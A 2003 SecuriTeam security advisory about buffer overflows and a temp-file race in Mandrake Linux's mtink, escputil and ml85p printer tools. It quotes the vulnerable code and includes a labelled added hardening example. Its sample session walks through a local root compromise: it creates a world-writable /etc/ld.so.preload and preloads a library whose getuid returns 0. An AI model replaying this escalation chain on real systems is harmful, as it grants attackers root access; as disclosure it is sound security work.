[UNIX] Buffer Overflows in Mandrake Linux printer-drivers Package
From: support@securiteam.com
Date: 01/22/03
From: support@securiteam.com
To: list@securiteam.com
Date: 22 Jan 2003 21:21:01 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Buffer Overflows in Mandrake Linux printer-drivers Package
------------------------------------------------------------------------
SUMMARY
MandrakeSoft Inc.'s Mandrake Linux includes the printer-drivers package in
most default installations. Specifically, the following three binaries are
included:
* mtink: a status monitor that reports the remaining ink quantity, prints
test patterns, and changes and cleans cartridges. It is maintained by
Jean-Jacques Sarton (jj.sarton@t-online.de).
* escputil: a utility to clean and align the heads of Epson Stylus
printers. It also checks current ink levels in the printer. It is
maintained by Robert Krawitz (rlk@alum.mit.edu) and Mike Sweet.
* ml85p: a Linux driver for Samsung ML-85G series printers. It is
maintained by Rildo Pragana (rildo@pragana.net).
Multiple vulnerabilities have been found in the tools mentioned above, see
details below.
DETAILS
Three vulnerabilities exist, the worst of which allows local root
compromise of a target system.
Vulnerability #1:
The mtink binary, installed set group id (gid) 'sys', contains a buffer
overflow in its handling of the HOME environment variable. Successful
exploitation provides an attacker with 'sys' group privileges. The
following snippet contains the offending segment of code:
void readRc(int idx)
{
    FILE *fp;
    char rcPath[1024];   /* fixed-size stack buffer */
    ...
    /* no length check: a HOME value longer than the buffer overruns rcPath */
    sprintf(rcPath,"%s/.mtinkrc",getenv("HOME"));
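The following is an added example, not code from mtink or the advisory, showing how the rcPath construction above can be done without the overflow: the length is checked via the return value of snprintf instead of truncating silently, and because the binary is set-gid, the home directory is taken from the passwd entry of the real uid rather than trusting HOME. The names build_rc_path, trusted_home and readRc_safe are assumed for illustration.

```c
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hardened replacement for the rcPath construction in readRc() (added example,
 * names assumed). Returns 0 and fills dst on success, -1 if home is missing or
 * the result would not fit including the terminating NUL. Never truncates. */
int build_rc_path(char *dst, size_t dstlen, const char *home)
{
    if (dst == NULL || dstlen == 0)
        return -1;
    if (home == NULL || home[0] == '\0') {
        dst[0] = '\0';
        return -1;
    }
    /* snprintf reports how many bytes it wanted; >= dstlen means the path
     * would have been cut, so reject it rather than use a wrong path. */
    int n = snprintf(dst, dstlen, "%s/.mtinkrc", home);
    if (n < 0 || (size_t)n >= dstlen) {
        dst[0] = '\0';
        return -1;
    }
    return 0;
}

/* In a set-id program the environment is attacker controlled, so prefer the
 * passwd entry of the real uid; fall back to HOME only if that is unavailable. */
const char *trusted_home(void)
{
    struct passwd *pw = getpwuid(getuid());
    if (pw != NULL && pw->pw_dir != NULL && pw->pw_dir[0] != '\0')
        return pw->pw_dir;
    return getenv("HOME");
}

/* Shape of a corrected readRc(): -1 on a bad home path, 0 otherwise. */
int readRc_safe(int idx)
{
    char rcPath[1024];
    (void)idx;
    if (build_rc_path(rcPath, sizeof rcPath, trusted_home()) != 0) {
        fprintf(stderr, "readRc: home directory unset or path too long\n");
        return -1;
    }
    FILE *fp = fopen(rcPath, "r");
    if (fp == NULL)
        return 0;   /* no rc file: nothing to read, not an error */
    /* ... parse settings here ... */
    fclose(fp);
    return 0;
}

int main(void)
{
    char path[1024];
    if (build_rc_path(path, sizeof path, trusted_home()) == 0)
        printf("rc path: %s\n", path);
    else
        printf("rc path rejected\n");
    return 0;
}
```

The size check matters beyond the overflow: a silently truncated path would make the program open a different file than intended, which is why the rejected case clears the buffer and returns an error.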
Vulnerability #2:
The escputil binary, installed set gid 'sys', contains a buffer overflow in
its parsing of the printer-name command line argument. Successful
exploitation provides an attacker with 'sys' group privileges.
Vulnerability #3:
The ml85p binary, installed set user id root, contains a race condition in
its opening of temporary files. Successful exploitation provides an
attacker with the ability to create or empty a file with super user
privileges. The following snippet contains the offending segment of code:
/* name is predictable (current time in seconds) and fopen("w+") follows an
 * existing link at that name, creating or truncating its target as root */
sprintf(gname,"/tmp/mlg85p%d",time(0));
if (!(cbmf = fopen(gname,"w+"))) {
An attacker can easily guess the name of a temporary file and then link
the guessed file to a file at another location. If the other file does not
exist, it is created world-writeable; if it does exist, the contents of
the file are lost. ml85p is, by default, installed without execute
permissions for 'other':
$ ls -l /usr/bin/ml85p
-rwsr-x--- 1 root sys 12344 Sep 17 12:40 /usr/bin/ml85p*
The binary, however, does provide execute permissions to the 'sys' group,
whose privileges can be gained using either of the two exploits in
Vulnerability #1 or #2. Once 'sys' privileges are obtained, an attacker
can exploit this race condition.
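The following is an added example, not code from ml85p or the advisory, showing the temporary-file handling above done safely. mkstemp() chooses an unpredictable name and creates it with O_CREAT|O_EXCL and mode 0600, so a link planted at a guessed name is never followed; where a fixed name cannot be avoided, open() with O_EXCL|O_NOFOLLOW refuses an existing entry (including a symbolic link) instead of truncating its target. The names open_private_tmp, create_exclusive and is_private_regular are assumed for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Replacement for the predictable "/tmp/mlg85p<time>" + fopen("w+") pattern
 * (added example, names assumed). On success the created path is copied into
 * path_out and a FILE* opened on the already-created descriptor is returned. */
FILE *open_private_tmp(char *path_out, size_t path_len)
{
    char tmpl[] = "/tmp/ml85pXXXXXX";   /* XXXXXX is replaced by mkstemp */
    int fd = mkstemp(tmpl);             /* O_CREAT|O_EXCL, mode 0600 */
    if (fd < 0)
        return NULL;
    if (strlen(tmpl) + 1 > path_len) {
        close(fd);
        unlink(tmpl);
        return NULL;
    }
    strcpy(path_out, tmpl);
    FILE *fp = fdopen(fd, "w+");        /* reuse the fd; never reopen by name */
    if (fp == NULL) {
        close(fd);
        unlink(tmpl);
        return NULL;
    }
    return fp;
}

/* For a fixed name: O_EXCL makes open() fail with EEXIST on anything already
 * present at the path, a planted symlink included, and O_NOFOLLOW guards the
 * non-creating case. Returns the descriptor or -1 (errno set). */
int create_exclusive(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Confirms that the file actually held is a regular file owned by the real
 * uid with no group/other permission bits, i.e. not world-writable as in
 * the advisory's ld.so.preload example. */
int is_private_regular(int fd)
{
    struct stat st;
    if (fstat(fd, &st) != 0)
        return 0;
    return S_ISREG(st.st_mode) && (st.st_mode & 0777) == 0600
           && st.st_uid == getuid();
}

int main(void)
{
    char path[64];
    FILE *fp = open_private_tmp(path, sizeof path);
    if (fp == NULL) {
        perror("open_private_tmp");
        return 1;
    }
    fputs("spool data\n", fp);
    printf("created %s (private=%d)\n", path, is_private_regular(fileno(fp)));
    fclose(fp);
    unlink(path);
    return 0;
}
```

The essential change is that the program never opens a temporary file by a name that could already exist: either the kernel picks the name atomically (mkstemp), or the program insists on creating the entry itself (O_EXCL) and treats "already exists" as a failure rather than reusing what is there.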
The following example walks through a sample attack utilizing the
above-described methods:
$ id
uid=501(farmer) gid=501(farmer) groups=501(farmer)
$ ./escputil_ex
Usage : ./escputil_ex [offset]
Address : 0xbffff6b0
Exploiting...
Escputil version 4.2.2, Copyright (C) 2000-2001 Robert Krawitz
Escputil comes with ABSOLUTELY NO WARRANTY; for details type 'escputil -l'
This is free software, and you are welcome to redistribute it under
certain conditions; type 'escputil -l' for details.
Cleaning heads...
lpr: unable to print file: client-error-not-found
/etc/profile.d/alias.sh:31: parse error: condition expected: !=
$ id
uid=501(farmer) gid=501(farmer) egid=3(sys) groups=501(farmer)
$ ls -l /etc/ld.so.preload
ls: /etc/ld.so.preload: No such file or directory
$ ./ml85p_ex /etc/ld.so.preload
Press a key to clean/create /etc/ld.so.preload file
Wrong file format.
file position: ffffffff
$ ls -l /etc/ld.so.preload
-rw-rw-rw- 1 root sys 0 Oct 21 09:09 /etc/ld.so.preload
$ cat > /tmp/lib.c <<EOF
heredoc> int getuid(void) { return 0; }
heredoc> EOF
$ gcc -fPIC -c /tmp/lib.c
$ gcc -o /tmp/lib.so -shared /tmp/lib.o
$ echo "/tmp/lib.so" > /etc/ld.so.preload
$ su -
# id
uid=0(root) gid=0(root) groups=0(root)
Analysis:
Any attacker with local access to a targeted system can launch this
attack. The ability to empty or create with root privileges any file on
the file system provides an attacker with many avenues of exploitation.
The above-described example is just one way of quickly gaining super user
privileges on a targeted system.
Detection:
Mandrake Linux 9.0 is vulnerable. By default, it includes the following
versions of the printer-drivers package:
* printer-utils-1.0-76mdk
* printer-filters-1.0-76mdk
Vendor fix and response:
MandrakeSoft has identified the problems and applied author-provided fixes
to the escputil and mtink vulnerabilities. A patch written by Till
Kamppeter was applied to ml85p to fix that vulnerability. Updates are
provided for Mandrake Linux 8.1 through 9.0 for the printer-drivers
packages, and ghostscript in 8.0 to fix these vulnerabilities
(MDKSA-2003:010).
Disclosure timeline:
10/06/2002 Issues disclosed to iDEFENSE
12/26/2002 Issues disclosed to jj.sarton@t-online.de, rlk@alum.mit.edu,
rildo@pragana.net, and security@linux-mandrake.com
12/26/2002 Issues disclosed to iDEFENSE clients
12/26/2002 Vendor responses from rlk@alum.mit.edu, jj.sarton@t-online.de
12/30/2002 Response from Vincent Danen (vdanen@mandrakesoft.com)
01/21/2003 Coordinated public disclosure
ADDITIONAL INFORMATION
The information has been provided by <mailto:labs@idefense.com> iDEFENSE
Labs, the vulnerability was discovered by <mailto:appelast@bsquad.sm.pl>
Karol Wiesek.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.